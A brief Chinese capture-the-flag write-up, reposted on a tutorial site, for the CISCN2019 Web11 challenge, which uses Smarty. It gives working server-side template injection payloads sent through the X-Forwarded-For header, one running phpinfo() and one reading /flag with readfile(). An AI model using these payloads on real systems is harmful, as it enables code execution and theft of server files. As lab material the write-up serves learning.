本文主要是介绍第六十三题——[CISCN2019 华东南赛区]Web11，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

题目地址：https://buuoj.cn/challenges

解题思路

第一步：进入题目，看到提示Smarty，猜测使用模板注入漏洞

第二步：构建漏洞

使用burpsuite改包，添加X-Forwarded-For头，X-Forwarded-For:{if phpinfo()}{/if}，发现执行了phpinfo()

第三步：获取flag

使用X-Forwarded-For:{if readfile('/flag')}{/if}获取flag

这篇关于第六十三题——[CISCN2019 华东南赛区]Web11的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！